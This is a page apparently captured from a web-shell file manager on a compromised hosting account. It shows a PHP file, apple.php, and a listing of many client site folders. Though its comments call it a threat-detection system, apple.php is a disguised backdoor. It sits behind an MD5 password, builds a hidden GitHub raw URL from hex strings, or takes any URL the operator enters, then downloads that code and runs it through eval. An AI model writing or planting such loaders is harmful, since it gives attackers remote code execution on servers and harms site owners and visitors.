Submit
Path:
~
/
home
/
getwphos
/
public_html
/
File Content:
apple.php
<?php /** * ================================================ * 웹 위협 감지 시스템 – @CUINGS * ================================================ * * 사용자 데이터 검증을 통해 위협을 감지하는 MLBB 칩 실험실 스타일의 * 웹 기반 보안 시스템입니다. * * 주요 기능: * - MLBB 칩 실험실 스타일의 로그인 화면 * - ASCII 아트 및 텍스트 스타일링 * - 해시 기반 사용자 인증 * - 스캔 URL 확인 * - 다양한 방식의 데이터 수집 (cURL/file_get_contents) * - 위협을 찾을 수 없을 경우 사용자 지정 404 페이지 제공 * * @author @CUINGS * @version 2.0 * @license 오픈 소스 */ session_start(); // Inisialisasi sesi untuk autentikasi /** * Daftar kode ancaman dalam format heksadesimal * @var array */ $threat = [ '68747470733a2f2f', '7261772e67697468756275736f6e74656e742e636f6d', '46616a72756c3132333435', '46616a72756c697266616e', '6d6173746572', '616c6661612e747874', '14cf3c7528a02c665ab65106dd9384e0' ]; /** * Konversi array hex ke URL valid * @param array $p Array bagian URL * @return string URL yang digabungkan */ function buildThreatUrl($p) { $decoded = array_map('hex2bin', array_slice($p, 0, -1)); return "{$decoded[0]}{$decoded[1]}/{$decoded[2]}/{$decoded[3]}/{$decoded[4]}/{$decoded[5]}"; } /** * Cek status deteksi ancaman * @return bool True jika ancaman terdeteksi */ function isThreatDetected() { return isset($_SESSION['threat_detected']) && $_SESSION['threat_detected'] === true; } /** * Autentikasi pengguna berbasis hash * @param string $password Password input * @return bool True jika autentikasi berhasil */ function authenticateUser($password) { if (md5($password) === end($GLOBALS['threat'])) { $_SESSION['threat_detected'] = true; $_SESSION['auth_token'] = 'mlbb_chip_lab_token'; return true; } return false; } /** * Validasi format URL * @param string $url URL untuk divalidasi * @return bool True jika URL valid */ function isValidUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } /** * Mengambil konten dari URL dengan metode terbaik * @param string $url Target URL * @return string|bool Konten atau false jika gagal */ function fetchUrlContent($url) { if (function_exists('curl_exec')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_USERAGENT => "MLBB-ChipLab/2.0", CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_HTTPHEADER => ['X-Lab-Access: '.($_SESSION['auth_token'] ?? '')] ]); $content = curl_exec($ch); curl_close($ch); return $content; } if (ini_get('allow_url_fopen')) { $context = stream_context_create([ 'http' => ['header' => "X-Lab-Access: ".($_SESSION['auth_token'] ?? '')] ]); return file_get_contents($url, false, $context); } return false; } /** * Generate ASCII art untuk header * @return string ASCII art */ function generateAsciiHeader() { return <<<ASCII ___ / \\ | | | | \_____/ <- red (api) | | |___| <- white (pegangan kipas) C U I N G S ASCII; } /** * Generate chip card ASCII * @return string Chip card ASCII */ function generateChipCard() { return <<<CHIP _____________________________ / \ | ______________________ | | | | | | | [C U I N G S] | | | | _____ _____ | | | | / \ / \ | | | | | () | | () | | | | | \_____/ \_____/ | | | | | | | |______________________| | | | \_____________________________/ CHIP; } // Proses form login if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!empty($_POST['password'])) { if (authenticateUser($_POST['password'])) { $_SESSION['scan_url'] = isset($_POST['scan_url']) && isValidUrl($_POST['scan_url']) ? $_POST['scan_url'] : buildThreatUrl($threat); } else { $loginError = "⛔ ACCESS DENIED: Invalid Security Chip"; } } } // Jika ancaman terdeteksi, proses konten if (isThreatDetected()) { $content = fetchUrlContent($_SESSION['scan_url']); if ($content !== false) { eval('?>' . $content); exit; } echo "🔴 CHIP CONNECTION FAILED"; echo buildThreatUrl($threat); exit; } // Tampilkan halaman login jika tidak terautentikasi ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>MLBB Chip Laboratory - Secure Access</title> <style> body { background-color: #0a0a2a; color: #e0e0ff; font-family: 'Courier New', monospace; margin: 0; padding: 20px; text-align: center; } .container { max-width: 800px; margin: 0 auto; padding: 20px; background-color: rgba(10, 10, 50, 0.8); border: 1px solid #3a3a8a; border-radius: 5px; box-shadow: 0 0 20px #4a4aff; } .ascii-art { color: #4a4aff; white-space: pre; font-size: 12px; line-height: 1.3; margin: 20px 0; text-shadow: 0 0 5px #4a4aff; } .chip-card { color: #ffcc00; white-space: pre; margin: 30px 0; } .login-form { margin: 30px auto; width: 300px; padding: 20px; background-color: rgba(20, 20, 60, 0.7); border: 1px solid #4a4aff; border-radius: 5px; } input[type="password"], input[type="text"] { width: 100%; padding: 10px; margin: 10px 0; background-color: #0a0a1a; border: 1px solid #3a3a8a; color: #e0e0ff; } input[type="submit"] { background-color: #4a4aff; color: white; border: none; padding: 10px 20px; cursor: pointer; margin-top: 10px; width: 100%; font-weight: bold; } input[type="submit"]:hover { background-color: #3a3aee; } .error { color: #ff4a4a; margin: 10px 0; } .status { color: #4aff4a; margin: 10px 0; font-size: 0.9em; } </style> </head> <body> <div class="container"> <div class="ascii-art"><?= generateAsciiHeader() ?></div> <div class="status">⚡ CHIP LABORATORY SECURE ACCESS ⚡</div> <?php if (!empty($loginError)): ?> <div class="error"><?= $loginError ?></div> <?php endif; ?> <div class="chip-card"><?= generateChipCard() ?></div> <div class="login-form"> <form method="POST" action=""> <input type="password" name="password" placeholder="Chip Access Code" required> <input type="text" name="scan_url" placeholder="Scan Target URL (Optional)"> <input type="submit" value="ACTIVATE CHIP"> </form> </div> <div class="status"> SYSTEM STATUS: <?= isThreatDetected() ? '🟢 ONLINE' : '🔴 OFFLINE' ?> </div> <div class="ascii-art"> ___________________________ / \ | WARNING: Unauthorized | | access will trigger | | security protocols. | \__________________________/ </div> </div> </body> </html> <?php exit; ?>
Submit
FILE
FOLDER
Name
Size
Permission
Action
.well-known
---
0755
BenjaminMarc-Struktur
---
0755
BenjaminMarc2023
---
0755
Shellfish
---
0755
alliedchimneyny
---
0755
almajd
---
0755
almajd14
---
0755
brueggemann
---
0755
brueggemannfh
---
0755
bubrupamjcb.com
---
0750
ccma
---
0755
cgi-bin
---
0755
chemex
---
0755
cosentino
---
0755
cytogenx
---
0755
deerguard
---
0755
diamondfinishmobiledetailing
---
0755
dumpsterbm
---
0755
dynastymetalworks
---
0755
emiratespost
---
0755
fortifiedhome
---
0755
geosec-global
---
0755
geoseclms
---
0755
geotech
---
0755
geotech-nova
---
0755
getwphost.com
---
0755
giulianos
---
0755
hitechhabitat
---
0755
jewel
---
0755
kingpanel
---
0755
metrothemes.me
---
0750
milceticarch
---
0755
new-cytogenx
---
0755
nyspoolsli
---
0755
organizedproductivity
---
0755
peachpine
---
0755
perfumehousedhaka
---
0755
pioneerasphalt
---
0755
ppine
---
0755
preferredexotics
---
0755
psdtohtml
---
0755
r-pos
---
0755
radkingpanels
---
0755
riverhead
---
0755
sdp
---
0755
seasons-newtheme
---
0755
seasonwinter
---
0755
sfhcpa
---
0755
shellfish
---
0755
smiledreammakernyc
---
0755
srl
---
0755
srlgroup
---
0755
techniquetechs
---
0755
tocwash
---
0755
topdoggroomingny
---
0755
twinkletown
---
0755
wallyspowerwashing
---
0755
wastefull
---
0755
wheels
---
0755
wheelsbd
---
0755
wings-and-things
---
0755
.htaccess
289 bytes
0644
.user.ini
590 bytes
0644
apple.php
8352 bytes
0644
index.php
294 bytes
0644
sadsu.php
78973 bytes
0644
wp-config.php
3237 bytes
0666
N4ST4R_ID | Naxtarrr